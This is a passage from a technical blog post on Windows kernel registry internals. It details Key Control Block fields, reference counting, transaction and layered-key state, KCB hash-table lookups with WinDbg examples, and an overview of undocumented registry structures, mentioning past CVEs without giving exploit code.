Stolen           : Ptr64 UChar    +0x0f0 TransKCBOwner    : Ptr64 _CM_TRANS    +0x0f8 KCBLock          : _CM_INTENT_LOCK    +0x108 KeyLock          : _CM_INTENT_LOCK    +0x118 TransValueCache  : _CHILD_LIST    +0x120 TransValueListOwner : Ptr64 _CM_TRANS    +0x128 FullKCBName      : Ptr64 _UNICODE_STRING    +0x128 FullKCBNameStale : Pos 0, 1 Bit    +0x128 Reserved         : Pos 1, 63 Bits    +0x130 SequenceNumber   : Uint8B I will not document each member individually, but will instead cover them in larger groups according to their common themes and functions.Reference count Key Control Blocks are among the most frequently referenced registry objects, as almost every persistent registry operation involves an associated KCB. These blocks are referenced in various ways: by a subkey's KCB.ParentKcb pointer, a symbolic link key's KCB.LinkTarget pointer, through the global KCB tree, via open key handles (and the corresponding key bodies), in pending transacted operations (e.g., the _CM_KCB_UOW.KeyControlBlock pointer), and so on. For system stability and security, it's crucial to accurately track all these active KCB references. This is done using the RefCount field, the first member in the KCB structure (offset 0x0). Historically a 16-bit field, it became a 32-bit integer, and on modern systems, it is a native word size—typically 64-bits on most computers. Whenever kernel code needs to operate on a KCB or store a pointer to it, it should increment the RefCount using functions from the CmpReferenceKeyControlBlock family. Conversely, when a KCB reference is no longer needed, functions like CmpDereferenceKeyControlBlock should decrement the count. When RefCount reaches zero, the kernel knows the structure is no longer in use and can safely free it. Besides standard reference counting, KCBs employ optimizations to delay certain memory management processes. This avoids excessive KCB allocation and deallocation when a KCB is briefly unreferenced. Two mechanisms are used: delay deref and delay close. The former delays the actual refcount decrement, while the latter postpones object deallocation even after RefCount reaches zero. Callers must use the specialized function CmpDelayDerefKeyControlBlock for the delayed dereference. From a low-level security perspective, it's worth considering potential issues related to the reference counting. Integer overflow might seem like a possibility, but it's practically impossible due to the field's width and additional overflow protection present in the CmpReferenceKeyControlBlock-like functions. A more realistic concern is a scenario where the kernel accidentally decrements the refcount by a larger value than the number of released references. This could lead to premature KCB deallocation and a use-after-free condition. Therefore, accurate KCB reference counting is a crucial area to investigate when researching Windows for registry vulnerabilities.Basic key information As mentioned earlier, one of the most important types of information in the KCB is the unique identifier of the key in the hive, consisting of the _HHIVE descriptor pointer (KeyHive) and the corresponding key cell index (KeyCell). Very frequently, the kernel uses these two members to obtain the address of the key node mapping, which resembles the following pattern in the decompiled code: _HHIVE *Hive = Kcb->KeyHive; _CM_KEY_NODE *KeyNode = Hive->GetCellRoutine(Hive, Kcb->KeyCell); // // Further operations on KeyNode... //Cached data from the key node Whenever some information about a key needs to be queried based on its handle, it is generally more efficient to read it from the KCB than the key node. The reason is that a pool-based KCB access requires fewer memory fetches (it avoids the cell map walk), bypasses the context switch to the Registry process, and eliminates the potential need to page in hive data from disk. Consequently, the following types of information are cached inside KCBs: Key name, which is stored in a public _CM_NAME_CONTROL_BLOCK structure and pointed to by the NameBlock member. Every unique key name in the system has its own instance of the _CM_NAME_CONTROL_BLOCK object, which is reference-counted and shared across all KCBs of keys with that name. This is an optimization designed to prevent storing multiple redundant copies of the same string in kernel memory.Flags, stored in the Flags member and being an exact copy of the _CM_KEY_NODE.Flags value. There is also the KcbUserFlags field that caches the value of _CM_KEY_NODE.UserFlags, and KcbVirtControlFlags, which caches the value of _CM_KEY_NODE.VirtControlFlags. The semantics of all of these bitmasks were discussed in Part 5.Security descriptor, stored in a separate _CM_KEY_SECURITY_CACHE structure and pointed to by CachedSecurity.Subkey count, stored in the SubKeyCount field. It expresses the cumulative number of the key's stable and volatile subkeys, i.e. it is equal to the sum of _CM_KEY_NODE.SubKeyCounts[0] and SubKeyCounts[1].Value list, stored in the ValueList structure of type _CHILD_LIST, and equivalent to _CM_KEY_NODE.ValueList.Key limits, represented by KcbMaxNameLen, KcbMaxValueNameLen and KcbMaxValueDataLen. They correspond to the key node fields with the same names without the "Kcb" prefix.Fully qualified path, stored in FullKCBName. It is lazily initialized in the internal CmpConstructAndCacheName function, either when resolving a symbolic link, or as a result of calling the documented CmCallbackGetKeyObjectID API. A previously initialized path may be marked as stale by setting FullKCBNameStale (the least significant bit of the FullKCBName pointer). It is essential for system security that the information found in KCBs is always synchronized with their key node counterparts. This is one of the most fundamental assumptions of the Windows registry implementation, and failure to guarantee it typically results in memory corruption or other severe security vulnerabilities.Extended flags In addition to the flags fields that simply mirror the corresponding values from the key node, like Flags, KcbUserFlags and KcbVirtControlFlags, there is also a set of extended flags that are KCB-specific. They are stored in the following fields:    +0x008 ExtFlags         : Pos 0, 16 Bits    +0x008 Freed            : Pos 16, 1 Bit    +0x008 Discarded        : Pos 17, 1 Bit    +0x008 HiveUnloaded     : Pos 18, 1 Bit    +0x008 Decommissioned   : Pos 19, 1 Bit    +0x008 SpareExtFlag     : Pos 20, 1 Bit [...]    +0x040 DelayedDeref     : Pos 0, 1 Bit    +0x040 DelayedClose     : Pos 1, 1 Bit    +0x040 Parking          : Pos 2, 1 Bit For the eight explicitly defined flags, here's a brief explanation: Freed: the KCB has been freed, but the underlying pool allocation may still be alive as part of the CmpFreeKCBListHead (older systems) or CmpKcbLookaside (Windows 10 and 11) lookaside lists.Discarded: the KCB has been unlinked from the global KCB tree and is not available for name-based lookups, but there may still be active references to it via open handles. It is typically set for keys that have been deleted, and for old instances of keys that have been renamed.HiveUnloaded: the underlying hive has been unloaded.Decommissioned: the KCB is no longer used (its reference count dropped to zero) and it is ready to be freed, but it hasn't been freed just yet.SpareExtFlag: as the name suggests, this is a spare bit that may be associated with a new flag in the future.DelayedDeref: the key is subject to a "delayed deref" mechanism, due to having been dereferenced using CmpDelayDerefKeyControlBlock instead of CmpDereferenceKeyControlBlock. This serves to defer the actual dereferencing of the KCB by some time, anticipating its near-future need and thus avoiding a redundant free-allocate sequence.DelayedClose: the key is subject to a "delayed close" mechanism, which is similar to delayed deref, but it involves delaying the freeing of a KCB structure even if its refcount has dropped to zero.Parking: the purpose of this bit is unclear, and it seems to be currently unused. Last but not least, the ExtFlags member stores a further set of flags, which can be expressed as the following enum: enum _CM_KCB_EXT_FLAGS {   CM_KCB_NO_SUBKEY           = 0x1,   CM_KCB_SUBKEY_ONE          = 0x2,   CM_KCB_SUBKEY_HINT         = 0x4,   CM_KCB_SYM_LINK_FOUND      = 0x8,   CM_KCB_KEY_NON_EXIST       = 0x10,   CM_KCB_NO_DELAY_CLOSE      = 0x20,   CM_KCB_INVALID_CACHED_INFO = 0x40,   CM_KCB_READ_ONLY_KEY       = 0x80,   CM_KCB_READ_ONLY_SUBKEY    = 0x100, }; Let's break it down: CM_KCB_NO_SUBKEY, CM_KCB_SUBKEY_ONE, CM_KCB_SUBKEY_HINT: these flags are currently obsolete, and were originally related to an old performance optimization. CM_KCB_NO_SUBKEY indicated that the key had no subkeys. CM_KCB_SUBKEY_ONE indicated that the key had exactly one subkey, and its 32-bit hint value was stored in KCB.HashKey. Finally, CM_KCB_SUBKEY_HINT indicated that the hints of all subkeys were stored in a dynamically allocated buffer pointed to by KCB.IndexHint. According to my analysis, none of the flags seem to be used in modern versions of Windows, even though their related fields in the KCB structure still exist.CM_KCB_SYM_LINK_FOUND: indicates that the key is a symbolic link whose target KCB has already been resolved during a previous access, and is cached in KCB.CachedChildList.RealKcb (older systems) or KCB.LinkTarget (Windows 10 and 11). It is an optimization designed to speed up the process of traversing symlinks, by performing the path lookup only once and later referring directly to the cached KCB where possible.CM_KCB_KEY_NON_EXIST: this is another deprecated flag that existed in historical implementations of the registry, but doesn't seem to be used anymore.CM_KCB_NO_DELAY_CLOSE: indicates that the key mustn't be subject to the "delayed close" mechanism, and instead should be freed as soon as all references to it are dropped.CM_KCB_INVALID_CACHED_INFO: this flag simply indicates that the IndexHint/HashKey/SubKeyCount fields contain out-of-date information that shouldn't be relied on.CM_KCB_READ_ONLY_KEY: this key is designated as read-only and, therefore, is not modifiable. The flag can be set by using the undocumented NtLockRegistryKey system call, which can only be called from kernel-mode. Shout out to James Forshaw who wrote an interesting post about it on his blog.CM_KCB_READ_ONLY_SUBKEY: the exact meaning and usage of the flag is unclear, but it appears to be enabled for keys with at least one descendant subkey marked as read-only. Specifically, the internal CmLockKeyForWrite function (the main routine behind NtLockRegistryKey's logic) sets it iteratively for every parent key of the read-only key, up to and including the hive's root.Key body list To optimize access, the KCB stores the first four key body handles in the KeyBodyArray for fast, lockless access. The KeyBodyListHead field maintains the head of a doubly-linked list for any additional handles.KCB lock The KcbPushlock member within the KCB structure is a lock used to synchronize access to the key during various registry system calls. This lock is passed to standard kernel pushlock APIs, such as ExAcquirePushLockSharedEx, ExAcquirePushLockExclusiveEx, and ExReleasePushLockExTransacted state The key control block is central to managing the transacted state of registry keys, maintaining pending changes in memory before they are committed to the hive. Several fields within the KCB are specifically dedicated to this function:KCBUoWListHead: This field is a list head that anchors a list of Unit of Work (UoW) structures. Each UoW represents a specific action taken within a transaction, such as creating, deleting a key or setting or deleting a value. This list allows the system to track all pending transactional operations related to a particular key, and it is crucial for ensuring atomicity, as it records the operations that must be applied or rolled back as a single unit.TransKCBOwner: This field is used to identify the transaction object that "owns" the key. It is set on the KCBs of transactionally created keys, and signifies that the key is currently only visible in the context of the specific transaction. Once the transaction commits, this field is cleared, and the key becomes visible in the global registry tree.KCBLock and KeyLock: Two so-called intent locks of type _CM_INTENT_LOCK, which are used to ensure that no two transactions can be associated with a single key if their respective operations could invalidate each other's state. According to my understanding, KCBLock protects the consistency of the KCB in this regard, and KeyLock protects the key node. The !reg ixlock WinDbg command is designed to display the internal state of these locks.TransValueCache: This field is a structure that caches value entries associated with a particular KCB, if at least one of its values has been modified in an active transaction. Before a value is set, modified or deleted within a transaction for the first time, a copy of the current value list is taken and stored here. When a transaction is committed, the TransValueCache state is applied back to the key's persistent value list. On rollback, the list is simply discarded.TransValueListOwner: This field is a pointer to a transaction that currently "owns" the TransValueCache. At any given time, for each key, there may be at most one active transaction that has any pending operations involving the key's values. These fields collectively form the core transaction management within the Windows Registry. Ever since their introduction in Windows Vista, they need to be correctly handled as part of every registry action, be it a read/write one, a transacted/non-transacted one etc. This is because the kernel must potentially incorporate any transacted state in any information queries, and must similarly pay attention not to allow the existence of two contradictory transactions at the same time, and not to allow a non-transacted operation to break any assumptions of an active transaction without invalidating it first. And any bugs related to managing the transacted state may have significant security implications, with some interesting examples being CVE-2023-21748 and CVE-2023-23420. The specific structures used to store the transacted state, such as _CM_TRANS or _CM_KCB_UOW, are discussed in more detail in the "Transaction structures" section below.Layered key state Layered keys were introduced in Windows 10 version 1607 to support containerisation through differencing hives. Because overlaying hives on top of each other is primarily a runtime concept, the Key Control Block (KCB) is the natural place to hold the state related to this feature, and there are three main members involved in this process: LayerSemantics: This 2-bit field indicates the state of a key within the layering system. It is an exact copy of the key's _CM_KEY_NODE.LayerSemantics value, cached in KCB for easier/quicker access. For a detailed overview of its possible values, please refer to Part 5.LayerHeight: This field specifies the level of the key within the differencing hive stack. A higher LayerHeight indicates that the key is higher up in the stack of layered hives, and a value of zero is used for base hives (i.e. normal non-differencing hives loaded on the host system).LayerInfo: This is a pointer to a _CM_KCB_LAYER_INFO structure, which describes the key's position within the stack of differencing hives. Among other things, it contains a pointer to the lower layer on the key stack, and the head of a list of layers above the current one. The specifics of the structures associated with this functionality are discussed in the "Layered keys" section below.KCB tree structure While key bodies are a common way to access KCB structures, they're not the only method. They are integral when you have an open handle to a key, as operations on the handle follow the handle → key body → KCB translation path. However, looking up keys by name or path is also crucial. Whether a key is opened or created, it relies on either an existing handle and a relative path (single subkey name or a longer path with backslash-separated names), or an absolute path starting with "\Registry\". In this scenario, the kernel needs to quickly check if a KCB exists for the given key and to obtain its address if it does. To achieve this, KCBs are organized into their own tree structure, which the kernel can traverse. The tree is rooted in CmpRegistryRootObject (specifically CmpRegistryRootObject->KeyControlBlock, as CmpRegistryRootObject itself is the key body representing the \Registry key), and mirrors the current registry layout from a high-level perspective. Let's highlight several key points:KCB Existence: There's no guarantee that a corresponding KCB exists for every registry key. KCBs are allocated lazily only when a key is opened, created, or when a KCB that depends on the one being created is about to be allocated.Consistent KCB Tree Structure: The KCB tree structure is always consistent. If a KCB exists for a key, then KCBs for all its ancestors up to the root \Registry key must also exist.Cached Information in KCBs: KCBs contain cached information from the key node, plus additional runtime information that may not yet be in the hive (e.g., pending transactions). Before performing any operation on a key, it's crucial to consult its KCB.KCB Uniqueness: At any given time, there can be only one KCB corresponding to a specific key attached to the tree. It's possible for multiple KCBs of the same key to exist in memory, but only if some of them correspond to deleted instances, in which case they are no longer visible in the global tree (only through the handles, until they are closed). Before creating a new KCB, the kernel should always ensure that there isn't an existing one, and if there is, use it. Failing to maintain this invariant can lead to severe consequences, as illustrated by CVE-2023-23420.KCB Tree and Hives: The KCB tree combines key descriptors from different hives and therefore must implement support for "exit nodes" and "entry nodes", as described in the previous blog post. Both exit and entry nodes have corresponding KCBs that can be viewed and analyzed in WinDbg. Resolving transitions between exit and entry nodes generally involves reading the (_HHIVE*, root cell index) pair from the exit node and then locating and navigating to the corresponding KCB in the destination hive. To speed up this process, the kernel uses an optimization that sets the CM_KCB_SYM_LINK_FOUND flag (0x8) in the exit node's KCB and stores the entry node's KCB address in KCB.LinkTarget, simulating a resolved symbolic link and avoiding the need to look up the entry's KCB every time the key is traversed. In the diagram above, entry keys are marked in blue, exit nodes in orange, and the special connection between them by the connector with black squares.Key Depth: Every open key in the system has a depth in the global tree, representing the number of nesting levels separating it from the root. This value is stored in the TotalLevels field. For example, the root key \Registry has a depth of 1, and the key \Registry\Machine\Software\Microsoft\Windows has a depth of 5.Parent KCB Pointer: Every initialized KCB structure (whether attached to the tree or not) contains a pointer to its parent KCB in the ParentKcb field. The only exception is the global root \Registry, for which this pointer is NULL. Now that we understand how the KCB tree works conceptually, let's examine how it is represented in memory. Interestingly, the KCB structure itself doesn't store a list of its subkeys. Instead, it relies on a simple 32-bit hash of the text string for fast lookups by name. The hash is calculated by multiplying successive characters of the string by powers of 37, where the first character is multiplied by the highest power and the last by the lowest (370, which is 1). This allows for a straightforward iterative implementation, shown below in C code: uint32_t HashString(const std::string& str) {   uint32_t hash = 0;   for (size_t i = 0; i < str.size(); i++) {     hash = hash * 37 + toupper(str[i]);   }   return hash; } Some example outputs of the algorithm are: HashString("Microsoft")      = 0x7f00cd26 HashString("Windows")        = 0x2f7de68b HashString("CurrentVersion") = 0x7e25f69d To calculate the hash of a path with multiple components, the same algorithm steps are repeated. However, in this case, the hashes of the successive path parts are treated similarly to the letters in the previous example. Therefore, the following formula is used to calculate the hash of the full "Microsoft\Windows\CurrentVersion" path: 0x7f00cd26 × 372 + 0x2f7de68b × 371 + 0x7e25f69d × 370 = 0x86a158ea The hash value calculated for each key, based on its path relative to the hive's root, is stored in KCB.ConvKey.Hash. Consequently, the hash value for the standard system key HKLM\Software\Microsoft\Windows\CurrentVersion is 0x86a158ea. Every hive has a directory of the KCBs within it, structured as a hashmap with a fixed number of buckets. Each bucket comprises a linked list of the KCBs located there. Internally, this directory is referred to as the "KCB cache" and is represented by the following two fields in the _CMHIVE structure:    +0x670 KcbCacheTable    : Ptr64 _CM_KEY_HASH_TABLE_ENTRY    +0x678 KcbCacheTableSize : Uint4B KcbCacheTable is a pointer to a dynamically allocated array of _CM_KEY_HASH_TABLE_ENTRY structures, and KcbCacheTableSize specifies the number of buckets (i.e., the number of elements in the KcbCacheTable array). In practice, the size of this KCB cache is 128 buckets for the virtual \Registry hive, 512 for the vast majority of hives loaded in the system, and 1024 for two specific system hives: HKLM\Software and HKLM\System. Given a specific key with a name hash denoted as ConvKey, its KCB can be found in the cache bucket indexed as follows: TmpHash = 101027 * (ConvKey ^ (ConvKey >> 9)); CacheIndex = (TmpHash ^ (TmpHash >> 9)) & (Hive->KcbCacheTableSize - 1); // // Kcb can be found in Hive->KcbCacheTable[CacheIndex] // The operation of translating a key's path hash to its KCB cache table index (excluding the modulo KcbCacheTableSize step) is called "finalization". There's even a WinDbg helper command that can perform this action for us: !reg finalize. We can test it on the hash we calculated for the "Microsoft\Windows\CurrentVersion" path: 0: kd> !reg finalize 0x86a158ea Finalized Hash for Hash=0x86a158ea: 0xc2c65312 So, the finalized hash is 0xc2c65312, and since the KCB cache hive size of the SOFTWARE hive is 1024, this means that the index of the HKLM\Software\Microsoft\Windows\CurrentVersion key in the array will be the lowest 10 bits, or 0x312. We can verify that our calculations are correct by finding the SOFTWARE hive in memory and listing the keys located in its individual buckets: 0: kd> !reg hivelistah ... | ffffe10d2dad4000 |    4da2000  | ffffe10d2da78000 |     3a6000    |  ffffe10d3489f000  | ffffe10d2d8ff000  | emRoot\System32\Config\SOFTWARE ... 0: kd> !reg openkeys ffffe10d2dad4000 ... Index 312:          86a158ea kcb=ffffe10d2d576a30 cell=000a58e8 f=00200000 \REGISTRY\MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION ... As we can see, our calculations have been proven to be accurate. We could achieve a similar result with the !reg hashindex command, which takes the address of the _HHIVE object and the ConvKey for a given key, and then prints out information about the corresponding bucket. Within a single bucket in the KCB cache, all the KCBs are linked together in a singly-linked list starting at the _CM_KEY_HASH_TABLE_ENTRY.Entry pointer. The subsequent elements are accessible through the _CM_KEY_HASH.NextHash field, which points to the KCB.KeyHash structure in the next KCB on the list. A diagram of this data structure is shown below: Now that we understand how the KCB objects are internally organized, let's examine how name lookups are implemented. Suppose we want to take a single step through a path and find the KCB of the next subkey based on its parent KCB and the key name. The process is as follows (assuming the parent is not an exit node):Get the pointer to the hive descriptor on which we are currently operating from ParentKcb->KeyHive.Calculate the hash of the subkey name based on its full path relative to the hive in which it is located.Calculate the appropriate index in the KCB cache based on the name hash and iterate through the linked list, comparing:The hash of the key name.The pointer to the parent KCB.If both of the above match, perform a full comparison of the key name. If it matches, we have found the subkey. The process is particularly interesting because it is not based on directly iterating through the subkeys of a given key, but instead on iterating through all the keys in the particular cache bucket. Thanks to the use of hashing, the vast majority of checks of potential candidates for the sought-after subkey are reduced to a single comparison of two 32-bit numbers, making the whole process quite efficient. The performance is mostly dependent on the total number of keys in the hive and the number of hash collisions for the specific cache index. If you'd like to dive deeper into the implementation of KCB tree traversal, I recommend analyzing the internal function CmpFindKcbInHashEntryByName, which performs a single step through the tree as described above. Another useful function to analyze is CmpPerformCompleteKcbCacheLookup, which recursively searches the tree to find the deepest KCB object corresponding to one of the elements of a given path. For those experimenting in WinDbg, here are a few useful commands related to KCBs and their trees:!reg findkcb: This command finds the address of the KCB in the global tree that corresponds to the given fully qualified registry path, if it exists.!reg querykey: Similar to the command above, but in addition to providing the KCB address, it also prints the hive descriptor address, the corresponding key node address, and information about subkeys and values of the given key.!reg kcb: This command prints basic information about a key based on its KCB. Its advantage is that it translates flag names into their textual equivalents (e.g., CompressedName, NoDelete, HiveEntry, etc.), but it often doesn't provide the specific information one is looking for. In that case, it might be necessary to use the dt _CM_KEY_CONTROL_BLOCK command to dump the entire structure.Other structures So far, this blog post has described only a few of the most important registry structures, which are essential to know for anyone conducting research in this area. However, in total, there are over 150 different structures used in the Windows kernel and related to the registry, and only about half are documented through debug symbols or on Microsoft's website. While it's impossible to detail the operation and function of all of these structures in one article, this section aims to at least provide an overview of a majority of them, to note which of them are publicly available, and to briefly describe how they are used internally. The layout of many structures corresponding to the most complex mechanisms is publicly unknown at the time of writing and requires significant time and energy to reconstruct. Even then, the correct meaning of each field and flag cannot be guaranteed. Therefore, the information below should be used with caution and verified against the specific Windows version(s) in question before relying on it in any way.Key opening/creation In PDB Structure name Description ❌ Parse context Given that the registry is integrated with the standard Windows object model, all operations on registry paths (both absolute and relative) must be performed through the standard NT Object Manager interface. For example, the NtCreateKey syscall calls the CmCreateKey helper function. At this point, there are no further calls to Configuration Manager, but instead, there is a call to ObOpenObjectByNameEx (a more advanced version of ObOpenObjectByName). Several levels down, the kernel will transfer execution back to the registry code, specifically to the CmpParseKey callback, which is the entry point responsible for handling all path operations (i.e., all key open/create actions). This means that the CmCreateKey and CmpParseKey functions, which work together, cannot pass an arbitrary number of input and output arguments to each other. They only have one pointer (ParseContext) at their disposal, which can serve as a communication channel. Thus, the agreement between these functions is that the pointer points to a special "parse context" structure, which has three main roles:Pass the input configuration of a given operation, e.g. information about:operation mode (open/create),transactionality of the operation,following of symbolic links,flags related to WOW64 functionality,optional class data of the created key.Pass some return information, such as whether the key was opened or created,Cache certain information within a single "parse" request, e.g.:information on whether registry virtualization is enabled for a given process,when following a symbolic link, a pointer to the originating hive descriptor, in order to check whether the given transition is allowed within the hive trust class,when following a symbolic link, a pointer to the KCB of its target (or the closest possible ancestor). Reconstructing the layout of this structure is a critical step in getting a better understanding of how the key opening/creation process works internally. ❌ Path info When a client references a key by name, one of the first actions taken by the CmpParseKey function (or more specifically, CmpDoParseKey) is to take the string representing that name (absolute or relative), break it into individual parts separated by backslashes, and calculate the 32-bit hashes for each of them. This ensures that parsing only occurs once and doesn't need to be repeated. The structure where the result of this operation is stored is called "path info". According to the documentation, a single registry path reference can contain a maximum of 32 levels of nesting. Therefore, the path info structure allows for the storage of 32 elements, in the following way: the first 8 elements being present directly within the structure, and if the path is deeply nested, an additional 24 elements within a supplementary structure allocated on-demand from kernel pools. The functions that operate on this object are CmpComputeComponentHashes, CmpExpandPathInfo, CmpValidateComponents, CmpGetComponentNameAtIndex, CmpGetComponentHashAtIndex, and CmpCleanupPathInfo. Interestingly, I discovered an off-by-one bug in the CmpComputeComponentHashes function, which allows an attacker to write 25 values into a 24-element array. However, due to a fortunate coincidence, path info structures are allocated from a special lookaside list with allocation sizes significantly larger than the length of the structure itself. As a result, this buffer overflow is not exploitable in practice, which has also been confirmed by Microsoft. More information about this issue, as well as the reversed definition of this structure, can be found in my original report.Key notifications In PDB Structure name Description ✅ _CM_NOTIFY_BLOCK The first time RegNotifyChangeKeyValue or the underlying NtNotifyChangeMultipleKeys syscall is called on a given handle, a notify block structure is assigned to the corresponding key body object. This structure serves as the central control point for all notification requests made on that handle in the future. It also stores the configuration defined in the initial API call, which, once set, cannot be changed without closing and reopening the key. This is in line with the official MSDN documentation: "This function should not be called multiple times with the same value for the hKey but different values for the bWatchSubtree and dwNotifyFilter parameters. The function will succeed but the changes will be ignored. To change the watch parameters, you must first close the key handle by calling RegCloseKey, reopen the key handle by calling RegOpenKeyEx, and then call RegNotifyChangeKeyValue with the new parameters." The !reg notifylist command in WinDbg can list all active notify blocks in the system, allowing you to check which keys are currently being monitored for changes. ❌ Post block Each post block object corresponds to a single wait for changes to a given key. Many post block objects can be assigned to one notify block object at the same time. The network of relationships in this structure becomes even more complex when using the NtNotifyChangeMultipleKeys syscall with a non-empty SubordinateObjects argument, in which case two separate post blocks share a third data structure (the so-called post block union). However, the details of this topic are beyond the scope of this post. The WinDbg !reg postblocklist command allows you to see how many active post blocks are assigned to each process/thread, but unfortunately, it does not show any detailed information about their contents.Registry callbacks In PDB Structure name Description ✅ REG_*_INFORMATION These structures are used for supplying callbacks with precise information about operations performed on the registry, and are part of the documented Windows interface. Consequently, not only their definitions but also detailed descriptions of the meaning of each field are published directly by Microsoft. A complete list of these structures can be found on MSDN, e.g., on the EX_CALLBACK_FUNCTION callback function (wdm.h) page. However, I have found in my research that in addition to the official registry callback interface, there is also a less official extension that Microsoft uses internally in VRegDriver, the module that supports differencing hives. If a given client, instead of using the official CmRegisterCallbackEx function, calls the internal CmpRegisterCallbackInternal function with the fifth argument set to 1, this callback will be internally marked as "extended". Extended callbacks, in addition to the information provided by the standard structures, also receive a handful of additional information related to differencing hives and layered keys. At the time of writing, the differences occur in the structures representing the RegNtPreLoadKey, RegNtPreCreateKeyEx, RegNtPreOpenKeyEx actions and their "post" counterparts. ❌ Callback descriptor The structure represents a single registry callback registered through the CmRegisterCallback or CmRegisterCallbackEx API. Once allocated, it is attached to a double-linked list represented by the global CallbackListHead object. ❌ Object context descriptor A descriptor structure for a key body-specific context that can be assigned through the CmSetCallbackObjectContext API. This descriptor is then inserted into a linked list that starts at _CM_KEY_BODY.ContextListHead. ❌ Callback context An internal structure used in the CmpCallCallBacksEx function to store the current state during the callback invocation process. For example, it's used to invoke the appropriate "post" type callbacks in case of an error in one of the "pre" type callbacks. These objects are freed by the dedicated CmpFreeCallbackContext function, which additionally caches a certain number of allocations in the global CmpCallbackContextSList list. This allows future requests for objects of this type to be quickly fulfilled.Registry virtualization In PDB Structure name Description ❌ Replication stack A core task of registry virtualization is the replication of keys, which involves creating an identical copy of a given key structure. This occurs under the path HKU\_Classes\VirtualStore when an application, subject to virtualization, attempts to create a key in a location where it lacks proper permissions. The entire operation is coordinated by the CmpReplicateKeyToVirtual function and consists of two main stages. First, a "replication stack" object is created and initialized in the CmpBuildVirtualReplicationStack function. This object specifies the precise key structure to be created within the virtualization process. Second, the actual creation of these keys based on this object occurs within the CmpDoBuildVirtualStack function.Transactions In PDB Structure name Description ✅ _KTRANSACTION A structure corresponding to a KTM transaction object, which is created by the CreateTransaction function or its low-level equivalent NtCreateTransaction. ❌ Lightweight transaction object A direct counterpart of _KTRANSACTION, but for lightweight transactions, created by the NtCreateRegistryTransaction system call. It is very simple and only consists of a bitmask of the current transaction state, a push lock for synchronization, and a pointer to the corresponding _CM_TRANS object. ✅ _CM_KCB_UOW The structure represents a single, active transactional operation linked to a specific key. In some scenarios, one logical operation corresponds to one such object (e.g., the UoWSetSecurityDescriptor type). In other cases, multiple UoWs are created for a single operation (e.g., UoWAddThisKey assigned to a newly created key, and UoWAddChildKey assigned to its parent). This critical structure has multiple functions. The key ones are connecting to KCB intent locks and keeping any pending state related to a given operation, both before and during the transaction commit phase. ✅ _CM_UOW_* Auxiliary sub-structures of _CM_KCB_UOW, which store information about the temporary state of the registry associated with a specific type of transactional operation. Specifically, the four structures are: _CM_UOW_KEY_STATE_MODIFICATION, _CM_UOW_SET_SD_DATA, _CM_UOW_SET_VALUE_KEY_DATA and _CM_UOW_SET_VALUE_LIST_DATA. ✅ _CM_TRANS A descriptor of a specific registry transaction, usually associated with a particular hive. In special cases, if operations are performed on multiple hives within a single transaction, then multiple  _CM_TRANS objects may exist for it. Given the address of the _CM_TRANS object, it is possible to list all operations associated with this transaction in WinDbg using the !reg uowlist command. ✅ _CM_RM A descriptor of a specific resource manager. It only exists if the given hive has KTM transactions enabled, and never exists for app hives or hives loaded with the REG_HIVE_NO_RM flag. Think of this structure as being associated with one set of .blf / .regtrans-ms log files, which usually means one _CM_RM structure is assigned to one hive. The exception is system hives (e.g. SOFTWARE, SYSTEM etc.) which all share the same resource manager that exists under the CmRmSystem global variable. Given the address of a _CM_RM object in WinDbg, you can list all associated transactions using the !reg translist command. ✅ _CM_INTENT_LOCK This structure represents an intent lock, with two instances (KCBLock and KeyLock) residing in the KCB. Their primary function is to ensure key consistency by preventing the assignment of two different transactions that contain conflicting modifications of a key. Given the object's address, WinDbg's !reg ixlock command can display some details about it. ❌ Serialized log records KTM transacted registry operations are logged to .blf files on disk to enable consistent state restoration in case of unexpected shutdown during transaction commit. The CmAddLogForAction function serializes the _CM_KCB_UOW object into a flat buffer and writes it to the log file using the CLFS interface. While the _CM_KCB_UOW structure can be found in public symbols, their corresponding serialized representations cannot. Notably, there was an information disclosure vulnerability (CVE-2023-28271) that was directly related to these structures. ❌ Rollback packet When a client performs a non-transactional operation that modifies a key, and there's an active transaction associated with that key, the transaction must be rolled back before the operation can be executed to prevent an inconsistent state. This is achieved using a structure that contains a list of transactions to be rolled back. This structure is passed to the CmpAbortRollbackPacket function, which carries out the rollback. Although the official layout of this structure is unknown, in practice it is quite simple, consisting of three fields: the current capacity, the current fill level of the list, and a pointer to a dynamically allocated array of transactions.Differencing hives (VRegDriver) In PDB Structure name Description ❌ IOCTL input structures The VRegDriver module works by creating the \Device\VRegDriver device, and communicates with its clients by supporting nine distinct IOCTLs within the corresponding VrpIoctlDeviceDispatch handler function. These IOCTLs, exclusively accessible to administrator users, facilitate loading and unloading differencing hives, configuring registry redirections for specific containers, and a few other operations. Each IOCTL requires a specific input data structure, none of which are officially documented. Therefore, practical use of this interface necessitates reverse engineering the required structures to understand their initialization. An example of a reversed structure, corresponding to IOCTL 0x220008 and provisionally named VRP_LOAD_DIFFERENCING_HIVE_INPUT, was showcased in blog post #4. This enabled the creation of a proof-of-concept exploit for a differencing hive vulnerability (CVE-2023-36404), demonstrating the ability to load custom hives and, consequently, expose the flaw. ❌ Silo context This silo-specific context structure is set by the VRegDriver during silo initialization using the PsInsertPermanentSiloContext function. It is later retrieved by PsGetPermanentSiloContext and used during both IOCTL handling and path translation for containerized processes. A brief analysis suggests that it primarily contains the GUID of the associated silo, a push lock used for synchronization, and a user-configured list of namespaces for the given container, which is a set of source and target paths between which redirection should occur. ❌ Key context This structure stores the context specific to a particular key being subject to path translation within a silo. It is usually allocated for each key opened within the context of a containerized process, and assigned to its key body using the CmSetCallbackObjectContext API. It primarily stores the original path of the key before translation — as the client believes it has access to — and several other auxiliary fields. ❌ Callback context (open/create) The callback-specific context structure stores shared data between "pre" and "post" callbacks for a given operation. This context is generally accessed through the CallContext field within the REG_*_INFORMATION structure relevant to the specific operation. In practice, VRegDriver only has one instance of a special structure defined for this purpose, used when handling the RegNtPreCreateKeyEx/RegNtPreOpenKeyEx callbacks. It saves specific data (RootObject, CompleteName, RemainingName) before the open/create request, to restore their original values in the "post" callback. ❌ Extra parameter This structure also appears to be used for temporarily storing the original key path during translation. However, its scope encompasses the entire key creation/opening process, rather than just a single callback. This means it can store information across callbacks, even when symbolic links or write-through hives are encountered during path traversal, causing the CmpParseKey function to return STATUS_REPARSE or STATUS_REPARSE_GLOBAL and restart the path lookup process. Although the concept of a whole operation context seems broadly applicable, currently there is only one type of "extra parameter" being used, represented by the GUID VRP_ORIGINAL_KEY_NAME_PARAMETER_GUID {85b8669a-cfbb-4ac0-b689-6daabfe57722}.Layered keys In PDB 